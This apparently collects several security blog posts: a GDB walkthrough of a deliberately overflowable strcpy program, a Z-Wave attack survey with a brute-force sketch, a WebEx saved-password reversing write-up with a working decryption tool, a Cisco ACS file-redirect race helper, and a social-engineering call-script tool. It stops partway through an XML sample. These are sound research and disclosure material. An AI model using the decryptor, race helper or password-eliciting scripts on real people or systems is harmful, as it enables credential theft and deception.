
Reversing Basics Part 3: Dynamically Reversing main()

By Robert Portvliet.

This is the third blog post in a four part series. In the first post, we reviewed the structure of a simple C program. In the second post, we reviewed how that program translated into assembly. In this post we’ll cover dynamic analysis of the main() function with GDB. We’ll run our simple program in GDB and take a look at what happens along the way.

As a refresher, make sure you've compiled our source code with the “-g” argument so debugging info is included in the compiled executable.

gcc -g -o basic basic.c
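If you don't have part one handy, here's a rough reconstruction of what basic.c might look like, pieced together from the behavior walked through in this series; the authoritative listing is in part 1, and func()'s body in particular is a guess beyond the fact that it receives argv[1]:

#include <stdio.h>
#include <string.h>

/* Reconstruction for reference only - buffer size and strcpy() are assumptions */
void func(char *arg)
{
    char buffer[10];
    strcpy(buffer, arg);
}

int main(int argc, char *argv[])
{
    printf("Passing user input to func()\n");
    func(argv[1]);
    return 0;
}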



Ok, so first things first, let’s fire up GDB

gdb -q ./basic



This will leave you at the (gdb) prompt.

First off, I should mention that GDB uses AT&T syntax by default, so if you wish to use Intel syntax (as I do), you can change it by using the command:

set disassembly-flavor intel



Secondly, we’ll cover some of the basic commands in GDB, but if you want to see a bunch more type help and it will list them out for you. Even better is to type help, and a category, such as help show or help info. This will show you all the subcommands under that category.

A couple interesting things we can do with GDB first. We can use the disassemble command to disassemble parts of, or our entire program. We can also use shortcuts. Type just enough of the command that GDB knows what you want to do, and hit enter. GDB also has tab autocomplete; start typing your command, and then hit tab. GDB will either finish the command or show you the possible options.

Another thing we can do is list out our source code, using the list command. By default, the list command will print out 10 lines of source code from the position you give it. Our program is 15 lines long, so if we want to see it all in one shot, we need to change the default with the command set listsize 20. You can view the default list size with the command show listsize.
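Put together, that looks like:

show listsize
set listsize 20
list 1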

Here's the output of the list command, with line 1 specified as the starting point



Ok, before we run our program, let’s set a couple of breakpoints: one at the beginning of main(), which is 0x080484bc, and another at the beginning of func(), which is 0x08048484. We can set these as follows:

break *0x080484bc
break *0x08048484



The asterisk denotes that the argument passed to break is a memory address.
We can view our breakpoints by typing info break. We can delete breakpoints by typing delete with no arguments to delete them all, or delete followed by the number of the breakpoint we want to remove, such as delete 11. Instead of deleting them, we can simply enable and disable them by typing enable or disable followed by the number of the breakpoint.
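In other words, breakpoint housekeeping boils down to:

info break
disable 1
enable 1
delete 1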

Here we show the output of disassemble func, then set a breakpoint at 0x08048484 (the beginning of func()), and finally view the breakpoints we have set.



One last thing: set the following to display the status of the EBP, ESP, and EIP registers each time we hit a breakpoint:

display /x $esp
display /x $ebp
display /x $eip



Ok, let’s run our program. We can run it by typing run, and we can give it an argument also. Let’s type run AAAA. The program will run and we’ll hit our first break point at 0x080484bc. We can confirm this by typing disas main, which shows that we’re on the first line of the main() function.

Here's line one of the main() function. It’s worth noting that the instruction the arrow points to in disassemble main has not executed yet. When you step through a program the arrow points to the next instruction to be executed, not the one that has just been executed.



We also see that EBP is at 0xbffff5c8, and ESP is at 0xbffff54c. So, we might ask ourselves, how large is our stack frame currently? Well, 0xC8 - 0x4C = 0x7C, or 124 decimal. So, it looks like our stack frame is 124 bytes (right now).

We can also confirm this another way. Just type x/w $ebp-124 to view the address at 124 bytes down the stack from EBP. It turns out to be the address in ESP. We’re also still in the function prologue for main(), and ESP hasn’t been copied into EBP yet, so we’re actually not looking at the size of the stack frame for main() right now, we’re looking at the previous stack frame.

Let's confirm the size of the stack frame at the time of the first instruction in main().



Incidentally, you may have noticed the x/w command being used above to examine memory locations. Here is a quick (and incomplete) rundown on using the ‘x’ command, with a short example after the list.

  • x/s [location] Allows us to examine the location as a string
  • x/w [location] Allows us to examine the location as a WORD (4 bytes)
  • x/i [location] Allows us to examine the location as an instruction
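For example, with values from this session:

x/s 0x80485ce
x/w $ebp-124
x/i $eip

The first shows the string later passed to puts(), the second the word 124 bytes below EBP, and the third the next instruction to be executed.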


Anyway, we could type ‘c’ or continue, and the program would run until it hit the next breakpoint, but we want to go one instruction at a time so we’re going to go with stepi instead.

So, once EBP gets pushed onto the stack in the first instruction, the value of ESP becomes 0xbffff548, and 0xC8 - 0x48 = 0x80, or 128 decimal, so our stack grew by 4 bytes, or one DWORD (remember, each push of a 32-bit register adds 4 bytes to the stack).

In line 1 we push EBP onto the stack. We start with a stack size of 124 bytes (from the previous stack frame). Then EBP is pushed onto the stack, resulting in a stack size of 128 bytes (Each DWORD is 4 bytes):



In line 2 ESP gets copied into EBP as part of the function prologue, and our new stack frame is created. It’s flat as a pancake right now with EBP and ESP at the same memory address:



In line 3 the stack gets aligned on a 16 byte boundary, which also has the effect of moving ESP 8 bytes down the stack. For a quick explanation of stack alignment, check out this article.



In line 4 we move ESP 16 bytes down the stack to allocate some space we will need going forward.



In line 5 we’re taking the string at 0x80485ce and pointing ESP at it. We can confirm what value is there by using the command x/w 0x80485ce.



We can confirm that ESP now points at 0x80485ce by using the command x/w $esp.



We’re going to use the nexti command to jump over the puts() function in this case. When we get to func() we’ll use stepi to dive in, but right now I’d like to get to the next instruction in main(). That’s the difference between the two: nexti steps over function calls, while stepi dives into them.

By the way, the puts() call is just a compiler optimization of printf(), and the result of puts() is that the string "Passing user input to func()" was printed to stdout.

Now that we’re past puts(), on lines 7 and 8 we move the value at ebp+0xc, or 0xbffff749, which is argv[0], into EAX, then add 0x4 to EAX, which gets us to 0xbffff758. This is argv[1], containing “AAAA”, the argument we passed to the program at runtime.



After line 7 has executed we can see that EAX points to 0xbffff749, which contains argv[0] or "/root/bo/basic":



After line 8 has executed we can see that EAX now points to 0xbffff758, which contains argv[1] or "AAAA":



Now on line 9 we get to an interesting instruction. As of line 8 EAX only points to argv[1], as we can prove by using the command x/s $eax. No luck getting back “AAAA” unless we do x/w $eax to get the memory address it points to (0xbffff758), and then use x/s 0xbffff758 to view the string at the memory address (“AAAA”).



However, after we use stepi to execute ‘mov eax, [eax]’ we can then use x/s $eax and the string “AAAA” truly is “in” EAX now. On line 10 we point ESP to the location of the contents of EAX. We’re basically pointing it at that memory address. We can verify this by using x/s $esp. We see that we get no string of “AAAA” back, but using x/w $esp gives us the memory address, 0xbffff758, that contains argv[1], our string of “A’s”.
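To recap that last step as GDB commands (each result is described above):

x/s $eax
x/w $esp
x/s 0xbffff758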



In the next installment we’ll dive into the func() function and finish running through the rest of our simple program in a debugger. Hope you enjoyed!


Potential attack vectors against Z-Wave®

By Robert Portvliet.

A couple years ago I was doing some research on Z-Wave, and after sifting through what was publicly available regarding the protocol I came up with some ideas as to how it might be attacked. My colleague Neelay Shah and I even worked on some code for it. However, at the time I concluded that I needed a USRP to make forward progress into writing a tool that could sniff Z-WAVE traffic, which was/is pretty important for a number of attacks. Not wanting to drop the $ at the time, I just shelved what I had for the moment, and figured I’d get back to it later. Well, you know how that goes, so here we are two years later and I’m likely not going to get around to it. Plus there seems to be a Blackhat talk on it this year, so I’m just going to dump what I have in this blog post, and if anyone finds it useful, so be it :)

For those not familiar with it, Z-Wave is a short range wireless protocol, which operates in the 900MHz ISM band (in the US), and is most commonly used for home automation. It is also supported by a number of alarm system and lock manufacturers. What follows is more or less a summary of what I was able to find publicly available regarding Z-WAVE, and what attacks might be possible against the protocol.

Background

When I began searching the internet for information on the protocol, I discovered that it seemed very little public security research had been done regarding Z-Wave. Even since then, the only research released is what Dave Kennedy and Rob Simon included in their Defcon 19 presentation.

There does, however, exist a fairly active community of home automation hobbyists who have reverse engineered portions of the protocol, primarily using serial sniffers. These enthusiasts have compiled a fairly large amount of data on the protocol through this reversing, and also from documents published by various vendors that detail parts of the protocol as it pertains to their specific products. There is also some Zensys documentation available on these sites such as the Z-Wave module selection guide, the Z-Wave protocol overview, and the Z-Wave node type overview and network installation guide. These hobbyists also publish a rather steady stream of blog posts and tutorials on how to write code that will allow one to interact with Z-Wave controllers and devices. Some of the best are available here:



One of the most useful things developed by the home automation community is an open source C++ library called OpenZ-Wave. Its associated Google Group is very active, and a good place to do research & ask questions. There was also another project which began to develop a Python wrapper known as Py-OpenZ-Wave with the goal of even further simplifying developing Z-Wave projects. Unfortunately, it seems that the Py-OpenZwave project hasn’t gotten very far since that time, but it’s a good idea nonetheless.

Utilizing this information it is possible to quickly gain a fairly decent understanding of the protocol and how its various components interoperate. A detailed description of the protocol is outside the scope of this post, but one of the best descriptions of the protocol publicly available can be found in the paper Catching the Z-Wave, by Mikhail Galeev. Also, as previously mentioned, the Z-Wave protocol docs are easily found on the internet. However, it should be noted that all of this documentation is from v4 (400) of the protocol and as such is slightly dated, but is still exceptionally useful.

Hardware

There are a couple of hardware items worth having to start off with. I was using an AEON Labs Z-Stick 2, which is ~ $40. There is also the AEON Labs Z-Stick Lite, but it’s not flashable and appears to be the same price as the regular Z-Stick now.

The other interesting piece of hardware is the Razberry Pi, which is a Z-Wave® ZM3102 module for the Raspberry Pi. However, the downside is that the Z-Way software it comes with is closed source, so you are limited in what you can do with the API provided to you (unless you reverse their binaries, of course). There is some documentation available here. You can grab the Z-Way bundle here.

A USRP would be a huge help if you don’t mind spending the coin. In truth the bus series would probably do the job at ~ $600 + the cost of the daughterboard. I’m waiting for the HackRF (frequency range 30 MHz to 6 GHz) to be publicly available. It will likely be a big help for stuff like this. The BladeRF (300MHz - 3.8GHz RF frequency range) doesn’t look bad either. It appears that some folks have been playing around with Z-Wave with the RTL-SDR, which is great for RX only, but has no ability to transmit.

Potential Attack Vectors

Ok, so enough of that. Here is what I came up with in terms of potential attack vectors.

Sniffing Z-Wave traffic

The first and obvious vector that came to mind was to sniff the Z-Wave network traffic in order to discover the HomeID, NodeIDs and other information about the network. This would be the easiest way to attack a network and could be done from a distance with a high gain 900MHz antenna. Unfortunately, no open source sniffers have yet been developed by the community.

Sigma sells a sniffer called the ‘Zniffer’ as part of their Z-Wave® Home Control Development Kit for about $3000 or so. However, you have to sign an NDA if you buy their devkit. Copies of their SDK, which include the firmware for the sniffer module, have made it into the wild, but you will still need the hardware to flash it to (and most likely a programmer). Still, it would be easier to design a sniffer by reversing the current firmware I suppose..

I was also able to locate a Lagotech HIP-22 sniffer for sale on EBay, and you can actually purchase it from a few places for ~ $150 but it also requires the Lagotek ‘HIT’ software to function.

As stated previously, a USRP and GNU Radio could be used to develop a sniffer as well. This would require figuring out the protocol from the ground up, and there’s something of a learning curve to GNU Radio, but if you’re already a software radio guy you’re ahead of the game in that area. The RTL-SDR is another possibility, but it’s RX only so you won’t be able to inject any packets. Again, I’m hoping to get my paws on a HackRF in the not too distant future, which I’m hoping will bridge the gap here.

Unpairing nodes from the network

An attack vector that I was investigating was the ability to unpair nodes from the network from a distance as a denial of service attack. However, the problem with unpairing a node from the network is that it requires the action to be initiated from both ends. This is commonly accomplished by pressing a button on the node in question and on the remote or the primary controller. An attacker would also need to utilize a high gain 900MHz antenna, as pairing is done using very low power, requiring the devices being paired to be within a proximity of 3' to one another. There is also full power inclusion, which works with devices that support it, but that only has a range of 20' (unobstructed), so the attacker would still require a high gain antenna. It may be possible to spoof the unpairing frames to the node, making them appear to come from the Z-Wave controller, but this still would not solve the problem of placing the node in the proper ‘listening’ state necessary to unpair it from the network. As stated previously, this has to be initiated on the node itself, making this attack largely impractical.

Attacking and unlocking door locks:

A rather desirable attack would be to find a way to cause a Z-Wave enabled door lock to open by sending it unauthorized traffic containing a command to unlock. What makes this a difficult attack is that door locks, like those made by Schlage, utilize the encryption command class in Z-Wave, which employs AES128, and are also supposedly using a one-time value for each frame sent to/from the door lock. However, they do have a weakness that an attacker may be able to exploit, but it requires a sniffer and for the attacker to be present when the locks are being added to the Z-Wave network. The locks perform a key exchange with the controller when they join the network, and if an attacker were to be there with a sniffer when this takes place they may be able to intercept this key and use it to encrypt/decrypt traffic. This window is obviously very narrow, but might be able to be abused by a home automation installer with malicious intent.

Denial of service attacks

An attack that is almost always possible when dealing with wireless communications of any sort is denial of service via jamming. Jamming is accomplished by transmitting a steady stream of ‘noise’ on the same frequency as the intended victim. Z-Wave operates in the 900MHz spectrum and a quick Google search reveals several 900MHz jammers commercially available for only a few hundred dollars, or you could build your own. The manufacturers claim about 30 meters effective range, but this could be increased dramatically using an amplifier. This attack would not require any knowledge of the target Z-Wave network other than its general location and could be sustained indefinitely.

Brute-forcing the HomeID

After reviewing all the possible attack vectors and taking into account the feasibility of each, as well as the time necessary to implement them, I decided the most practical plan of attack would be to write a tool that would brute force the HomeID. The 32-bit HomeID value is required to send and receive traffic to a specific Z-Wave network. The idea would be to write a bit of code that would iterate through this value and, for each iteration, send a single frame to a NodeID on the network likely to exist, such as NodeID 0x02, and then listen a few milliseconds for an acknowledgment frame (ACK).
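To make the idea concrete, here is a conceptual C sketch of that loop. Nothing here talks to real hardware: send_probe() is a hypothetical stand-in for whatever SDR or dongle code would actually transmit the frame and listen for the ACK, and only the fact that the HomeID occupies the first four bytes of the frame is taken from the protocol documentation referenced above.

#include <stdint.h>
#include <stdio.h>
#include <stdbool.h>

/* Hypothetical helper: build a minimal frame whose first four bytes are the
   candidate HomeID, transmit it to a NodeID likely to exist (e.g. 0x02), and
   listen a few milliseconds for an ACK. Radio plumbing is omitted entirely. */
static bool send_probe(uint32_t homeid, uint8_t target_node)
{
    uint8_t frame[16] = {0};
    frame[0] = (uint8_t)(homeid >> 24);
    frame[1] = (uint8_t)(homeid >> 16);
    frame[2] = (uint8_t)(homeid >> 8);
    frame[3] = (uint8_t)(homeid);
    /* remaining fields (NodeIDs, frame control, checksum) and the actual
       transmit/receive code are left out of this sketch */
    (void)frame;
    (void)target_node;
    return false;
}

int main(void)
{
    for (uint64_t candidate = 0; candidate <= 0xFFFFFFFFULL; candidate++) {
        if (send_probe((uint32_t)candidate, 0x02)) {
            printf("HomeID found: 0x%08x\n", (uint32_t)candidate);
            return 0;
        }
    }
    return 1;
}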

My colleague Neelay Shah offered to write the code, and we utilized information regarding how to craft and send Z-Wave frames from http://www.digiwave.dk/en/programming/the-z-wave-protocol-in-csharp/, as well as sample code provided by the same site, to help craft the tool which would perform the attack. This sample code was modified and then integrated with our code that would iterate through the 32-bit HomeID, which comprises the first four bytes of the Z-Wave frame. This code was tested and found to be functional, but unfortunately it had one oversight that proved difficult to address: the HomeID in the Z-Wave frame cannot be changed to a value different from the HomeID set in the EEPROM on the Z-Wave dongle. If this occurs, the driver does not know how to handle it and will not send the frame. At first glance this seems like a fairly easy challenge to surmount: simply update the value in the EEPROM as well. The problem with this approach is that there are 4.3 billion possible values for the 32-bit HomeID, and an EEPROM will only take about one million writes (or less, depending upon quality) before it wears out, long before the correct value for the HomeID would be discovered. A possible solution to this problem would be to investigate whether the HomeID value could be modified in memory instead, but it also seems to not be possible to modify the HomeID in memory when using a Z-Wave dongle. So, the most practical way to approach this attack appears to once again be to use SDR to create the tools that provide the functionality necessary to perform the attack.

If one were to implement this attack utilizing SDR, there still remains the issue of brute forcing 4.3 billion possible values, which could potentially take hundreds of hours. However, there exists the possibility of enhancing this attack by narrowing down the number of values an attacker would need to iterate through. Manufacturers such as Motorola are allocated unique blocks of HomeIDs by Sigma. If these HomeIDs are allocated in sequential order and one was able to collect the HomeIDs from several devices made by that particular manufacturer, it may be possible to narrow the values needing to be brute forced to a few million, which would take far less time to attack.

I am including the code that Neelay wrote for the HomeID brute forcing. As I said, it’s not really effective unfortunately, but I’m including it in case it is useful to anyone.



Additional Resources

Quick Reversing - WebEx One-Click Password Storage

By Brad Antoniewicz.

Cisco's WebEx is a hugely popular platform for scheduling meetings. You can conduct video and voice calls, screen sharing, and chat through the system. Meetings are usually created via a Web Portal where the user defines when the meeting starts, how long it goes for, and what services (e.g. screen sharing or just voice) their meeting will leverage. WebEx also provides a One-Click Client that offers standalone meeting scheduling and Outlook integration so that users can avoid the Web Portal.

The One-Click Client has the ability to save a user's password, so I decided to take a quick look at that functionality - in about an hour I was able to determine the storage, reverse the method it used to encrypt the password, and write a proof of concept tool to decrypt the local storage of the password. The aim of this blog post is to document that process and maybe encourage you to do some reversing!

Process Monitor

Usually the first step when evaluating client applications is to get an understanding of what file system changes the application is performing (reads/writes). This is especially true when you're looking for something that's being stored (in this case, the saved password) because stored info is usually written to a file, a database, or the Windows registry.

Process Monitor is one of those core tools that everyone should have handy and is perfect for this use case.

At this point in the process, we'll focus on One-Click's ptInst.exe executable. It's run during the initial install for One-Click and asks the user for a username/password/server URL and whether the application should save the password. With ptInst.exe running, we can launch Process Monitor.

The first step is to create a filter for the executable to avoid getting overwhelmed with information from other processes. Remove all existing filters and then create one to include all processes whose name is "ptinst.exe":



Next up, provide the application a username, password and URL, and tell it to save the password. As soon as the login button is clicked, Process Monitor will show a ton of activity. The first thing that catches my eye is that there are a bunch of writes to the resp.xml XML file.



It's common for applications to store configuration information in an XML file, so maybe we'll get lucky with this one.



resp.xml does contain lots of data, but unfortunately there are 6 stars in place of the actual password (password length is greater than 6, fwiw). So back to Process Monitor.

The next thing that may catch your eye is a number of queries to the registry. It's very common to see applications using the registry to store various information. These queries are particularly interesting because they contain the word "Password":



This is a pretty good indication that the password and password length are stored in the registry. To confirm, check the registry keys themselves. It turns out that the HKCU\Software\WebEx\ProdTools\Password key stores some hex value that isn't the cleartext password, and HKCU\Software\WebEx\ProdTools\PasswordLen contains the length of the password.

At this point, we need to determine what the value of HKCU\Software\WebEx\ProdTools\Password is. It's probably the password, somehow obfuscated or encrypted, but deciphering it isn't obvious.

IDA Pro

IDA Pro is another core tool. It's really the de facto tool for reverse engineering. Freeware and Evaluation versions are available and should be completely capable if you're following along (although I am using the paid version).

Strings

Programs often contain constant string values to be used when performing certain functions. For instance, ptInst.exe will likely always use the same registry keys (e.g. HKCU\Software\WebEx\ProdTools\Password), so those actual strings should be stored somewhere within the binary. There are a number of programs that allow you to search for strings within a binary, we'll use IDA (View - Open SubViews - Strings):



If you search through the string list, you'll notice the registry key names aren't there. This is because, by default, IDA will only show zero-terminated ASCII C strings. We'll see a little later that our strings are passed to a Unicode Windows API function.

To show Unicode strings within IDA, right click the Strings tab and go to "Setup". Next select "Unicode" under "Allowed String Types":



Scrolling through the Strings Window a second time will reveal the unicode encoded key name we're looking for: "Password". Double clicking it will open IDA View-A and bring us to the data segment in the binary where the string is located. You'll notice that right above the unicode entry, at the same address, IDA automatically gave this location a variable name, "aPassword".



By selecting "aPassword" and pressing the "x" key, you'll see all of the cross references to that variable name - This is everywhere its used in the program.



We just need to find where the registry key is either set or read and we'll likely see a call to some function nearby that decrypts it. The second reference, sub_34161C+1EB, looks to be setting the value since, a few instructions after the reference, a call to RegSetValueExW() is made.



RegSetValueEx()

An observation to make is that the program is calling RegSetValueExW(). The "W" stands for "wide" which indicates the program is using the Unicode version of the RegSetValueEx() API function. This speaks to why we needed to configure our Strings Window to show Unicode strings. Had the function been RegSetValueExA(), we'd be using the ANSI version.

If we look at the RegSetValueEx() MSDN page we see that the fifth value passed to the function is a pointer to the data which is to be stored within the registry key. IDA helps us out a bit by showing the same data types for each of the values being pushed onto the stack as the MSDN entry. Looking at the fifth value pushed onto the stack (working backwards from the call to RegSetValueExW()), we see lpData, which is stored within the EAX register. Its value is loaded into that register by the preceding call, where we find it's actually the value [ebp+428h+var_428]. If we highlight that, then look at the previous references, we'll discover that this value is always used above as the destination in an earlier call to memcpy().



So this means that it's likely the value being set for the Password registry key is the result of the memcpy(). We'll need to realign our trace to follow the source variable of that memcpy() if we want to figure out how our saved password is stored.

To the Source

If we highlight the Src to the memcpy(), or [ebp+428h+Src], we'll see it's used above and pushed onto the stack:



The function call after a bunch of pushes is to sub_3412bb. If we look at it, it's a pretty simple function and doesn't really alter the stack:



This means our Src is still on the stack and may be used by the following function call to the CryptoData() exported function. CryptoData() sets up a stack frame and then does a quick jump to sub_342332:



Function sub_342332 starts to look interesting. First up, it has a bunch of arguments, which means that just by eyeing it up we can guess that our Src will likely be used. If we count the number of elements pushed onto the stack, then look at the number of arguments IDA identified in the function, we can get an idea:



Looks like they all line up. Also make note of the cmp [ebp+arg_1c], 0. We can clearly see that the calling function sets that to 1, so we know that we'll be taking the negative branch on the jz below.

Keys!

The negative branch brings us to sub_34227b which looks like gold. From a quick overview, we see that there is some constant value being loaded into an array or structure:



And then there are calls to AES_set_encrypt_key() and AES_ofb128_encrypt(). A quick search will reveal both of these functions are part of the OpenSSL libraries. What's even better is that someone else has already implemented these functions in an open project. For whatever reason the OpenSSL documentation doesn't have full coverage of both of these functions, so this project helps to reduce the effort in guessing what the higher level code looks like and ultimately what's needed to reimplement it.

AES_set_encrypt_key

First up I wanted to identify what values were being passed to AES_set_encrypt_key(). I knew its arguments were something like:

 AES_set_encrypt_key (const unsigned char *someKey, const int size, AES_KEY *keyCTX)



To make life easier, I used WinDBG, set a breakpoint on the call, and inspected the memory at that location. What I discovered is that the key being used was a combination of these two registry keys:

  • HKEY_CURRENT_USER\Software\WebEx\ProdTools\UserName
  • HKEY_CURRENT_USER\Software\WebEx\ProdTools\SiteName


For UserName I had braanton and for SiteName I had siteaa.webex.com/siteaa. When looking at WinDBG, the value being passed to AES_set_encrypt_key() was:

 braantonsiteaa.webex.com/siteaab



Which led me to believe the key was essentially the UserName value concatenated with the SiteName and repeated until it filled 32 characters (which accounts for the trailing "b").
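A small sketch of that key derivation in C, using the example values above (this is my reading of the observed behavior, not code pulled from the binary):

#include <stdio.h>
#include <string.h>

/* Concatenate UserName and SiteName, then repeat the result to fill 32 bytes. */
static void build_key(const char *user, const char *site, unsigned char key[32])
{
    char combined[256];
    size_t len, i;

    snprintf(combined, sizeof(combined), "%s%s", user, site);
    len = strlen(combined);
    for (i = 0; i < 32; i++)
        key[i] = (unsigned char)combined[i % len];
}

int main(void)
{
    unsigned char key[32];

    build_key("braanton", "siteaa.webex.com/siteaa", key);
    printf("%.32s\n", (char *)key);   /* prints braantonsiteaa.webex.com/siteaab */
    return 0;
}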

AES_ofb128_encrypt

A little searching revealed the arguments for AES_ofb128_encrypt should be something like:

 AES_ofb128_encrypt(*in, *out, length, *key, *ivec, *num);



This is where that big constant value comes in. If you look at it fully assembled, you'll find that it is:

 123456789abcdef03456789abcdef012



This gives us everything we need to encrypt the password; our pseudocode for the assembly in sub_34227b would look something like:

 IV = 123456789abcdef03456789abcdef012;
password = "some value";
key = [UserName + SiteName repeated to 32 chars];
num=0;

AES_KEY keyCTX;

AES_set_encrypt_key (key, 256, &keyCTX);

AES_ofb128_encrypt(password, out, sizeof(password), &keyCTX, IV, &num);



Decrypting

AES_ofb128_encrypt() uses output feedback (OFB) which makes the decryption process nearly identical to the encryption process. All we have to do is provide the encrypted value (i.e. the one stored in the Password key) with the appropriate length (i.e. the one stored in the PasswordLen key) and we'll be able to decrypt it. This all comes down to the static IV and the UserName/SiteName key values. To demonstrate this, I wrote the following Proof of Concept code:
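The PoC itself isn't reproduced here, but a minimal reconstruction along these lines works; the regVal bytes and key below mirror the example run further down, and treating the 32-hex-character constant as 16 raw IV bytes is my assumption (link against OpenSSL's libcrypto):

#include <stdio.h>
#include <openssl/aes.h>

int main(void)
{
    /* Encrypted bytes from HKCU\Software\WebEx\ProdTools\Password (example values) */
    unsigned char regVal[] = { 0xcc, 0x6d, 0xc9, 0x3b, 0xa0, 0xcc,
                               0x4c, 0x76, 0x55, 0xc9, 0x3b, 0x9f };
    int passwordLen = sizeof(regVal);   /* normally taken from the PasswordLen key */

    /* UserName + SiteName repeated out to 32 bytes, as described above */
    unsigned char key[] = "braantonsiteaa.webex.com/siteaab";

    /* Static IV - assuming the constant 123456789abcdef03456789abcdef012
       represents 16 raw bytes */
    unsigned char iv[AES_BLOCK_SIZE] = {
        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
        0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };

    unsigned char out[256] = {0};
    int num = 0;
    AES_KEY keyCTX;

    /* OFB mode: decrypting is the same operation as encrypting */
    AES_set_encrypt_key(key, 256, &keyCTX);
    AES_ofb128_encrypt(regVal, out, passwordLen, &keyCTX, iv, &num);

    printf("Password = %s\n", out);
    return 0;
}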



You'll need to edit the source and manually define the appropriate values for regVal and key then just compile and run:

 brad@wee:~/onedecrypt$ gcc -o webex-onedecrypt -lssl webex-onedecrypt.c
brad@wee:~/onedecrypt$ ./webex-onedecrypt
Reg Key Value = cc 6d c9 3b a0 cc 4c 76 55 c9 3b 9f
Password = bradbradbrad



Contacting Cisco

As always, I contacted Cisco and let them know of my findings - and as always they were really responsive and welcoming. This issue is being tracked under Cisco PSIRT Case PSIRT-0219916903 if you want more info!


Hope you liked this, if so - Follow me on twitter - @brad_anton

Cisco ACS Local PAC File Write Redirect

By Brad Antoniewicz.

A couple of months ago I came across a sort of interesting bug in CSUtil.exe. I'd say the overall severity of the vulnerability is pretty low, but I'm wondering if anyone can think of creative ways to exploit it. In this post I'll describe the vulnerability and if you can think of a cool way to exploit it, let me know in the comments below.

CSUtil.exe

CSUtil.exe is a command line utility included within Cisco ACS for Windows. It can perform a variety of functions to parse data from the ACS database and is often used to manually back up the database. It's most commonly invoked by a user with appropriate administrator-level rights, and output files are stored by default within the directory from which the utility was run.

File Write Redirect

The vulnerability is introduced when issuing the "-t" option, which retrieves a local user's PAC and writes it to a file. During the export process, CSUtil.exe writes a string to a temporary file, tmpUserFileName.txt, then later uses that string as the file name to write the PAC file to. If someone else writes an alternate string to tmpUserFileName.txt after CSUtil.exe has written the initial string, it's possible to redirect the location to which the PAC file gets written.
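To picture the race, here's a tiny hypothetical C helper an attacker sitting in the same directory might run alongside "CSUtil.exe -t"; the target path is made up, and as noted further down it has to end in ".pac":

#include <stdio.h>

int main(void)
{
    /* Keep rewriting tmpUserFileName.txt so that, if our write lands after
       CSUtil.exe's initial write but before it reopens the file, the PAC file
       gets written to a path of our choosing (hypothetical example path). */
    for (;;) {
        FILE *f = fopen("tmpUserFileName.txt", "w");
        if (f) {
            fputs("C:\\somewhere\\else\\redirected.pac", f);
            fclose(f);
        }
    }
}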

This is demonstrated in the following Video:



Some important notes to mention:

  • tmpUserFileName.txt is written to the same directory where the tool was run from and thus the attacker must have appropriate permissions to write to files within that directory
  • This attack appears to be very much timing related since the attacker would need to overwrite the tmpUserFileName.txt file contents after CSUtil.exe is run but before it completes
  • It is possible to overwrite existing files at potentially arbitrary locations, but they must end in ".pac".

So... In my mind, this is a relatively low risk issue given all of the restrictions. What do you think? Can you make it a high?

Contacting Cisco

As always, I contacted Cisco and let them know of my findings - and as always they were really responsive and welcoming. This issue is being tracked under Cisco PSIRT Case PSIRT-0354447345 and Bug ID CSCug61874 if you want more info!

FSFlow - A Social Engineering Call Flow Application

By Brad Antoniewicz.

A few months ago I was thinking about ways to improve and standardize social engineering calls. It's a difficult thing to do, conversations can go almost anywhere over the span of a phone call which makes defining a specific process hard, if not impossible. As I explored the idea, I was reminded of a high school friend who had a telemarketer job one summer. He told me how nearly everything they said was presented to them on a screen in front of them, and they would navigate through a process flow as the call progressed. I decided to use this model and apply it to social engineering in a tool called "FSFlow". Now this is mostly a proof of concept tool but it's fully functional so I encourage you to try it out. Here's what its all about.

Judging User Responses

One of the major pains with designing an application like this is judging the response of a user. You can never predict the user's exact response so the measure of the response needs to be somewhat abstracted. Our approach here is to identify if the user's response is positive or negative. For instance, if you say "Hi, How are you?" and they say "Great!" - that's a clearly positive response, while "What do you want." is a bit more negative. Similarly, if you ask someone "What is your password?" and they provide it to you, that would be positive, while anything else is likely to be negative.

The difficult thing here is that many user responses aren't easily categorized as negative or positive; perhaps a sliding scale would be more appropriate - but that would create tons of possible branches, making a complete call flow impractical.

Another really interesting option that was suggested to me is using voice analysis to identify how the user feels. The person who suggested the idea used to work for a company that would try to identify if a person was happy, sad, felt helped, etc... after a customer service call. It would be interesting to implement this in the future.

Logging

Another hugely important thing we wanted to do with FSFlow is capture how the call progressed. The call log records how the call progresses and what information is obtained at what points in the call flow. You could potentially use this information to determine where users need more security awareness training - e.g. every user was willing to disclose their IP address, but only some gave their password, or when asked a specific question users got suspicious and ended the call.

While we don't do this now, another suggestion we received was to record the conversation or integrate it with Skype - so that the calls can be reviewed later on.

The Interface

FSFlow's interface is meant to be as simple and straightforward as possible so that the caller is not overwhelmed or distracted during the call. During the planning phase of the application, I created a sketch to outline what the interface should look like:



For the first release, we slimmed things a bit, resulting in 4 major areas: the statement pane, response pane, objectives and call variables:



Statement Pane

The statement pane is the actual wording the caller says during the call. This is your social engineering attack. The important thing about this pane is that the wording is clear and easy to read aloud. You'll notice in the screenshot above that there are placeholders, e.g. "[TARGETNAME]"; these are call-specific variables that are filled in once you populate the Call Variables pane (described below).

Response Pane

Directly under the statement pane is the response pane, comprised of the "Negative Response", "Positive Response", "Busted" and "Recovery Mode" buttons. Each of these buttons progresses the call to the next flow state. The "Recovery Mode" button is meant to gently direct the call to an end without aggravating the callee. The "Busted" button is more of an "Ok, you got me" response where you let the callee know that this is a social engineering call, that they should contact the point of contact for the company (the person that hired the caller), and to please not tell their coworkers about the test :)

Objectives

The Objectives pane is where the caller can log what elements of information they're able to obtain during the call.

Call Variables

Call Variables customize the flow to each individual call. Before the call starts, the caller populates these variables so that the placeholders in the statement pane are replaced with pertinent information. It also serves as a reminder to the caller of who they are pretending to be!

The Call Flow

The most important component of FSFlow is its XML based call flows. The idea behind the call flows is that they can be easily shared, improved, and used to build standardized attacks. Let's look at sample.xml that's included with the application.

The entire call flow is included within a <CallFlow> block which takes one attribute, name. Within the CallFlow block, you have Objective, CallBlock, and FlowBlock elements.
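Assembled from the fragments below, a minimal skeleton looks something like this:

<CallFlow name="Sample Flow">
  <Objective>Login Username</Objective>

  <CallBlock name="Introduction">
    <statement value="Hello [TARGETNAME], *PAUSE* My name is [CNAME] from [CROLE]"/>
  </CallBlock>

  <FlowBlock name="FlowBlock1">
    <CallBlockFlow value="Caller Pickup">
      <PositiveResponse value="Introduction"/>
      <NegativeResponse value="No Answer"/>
      <RecoveryResponse value="Recovery Response"/>
    </CallBlockFlow>
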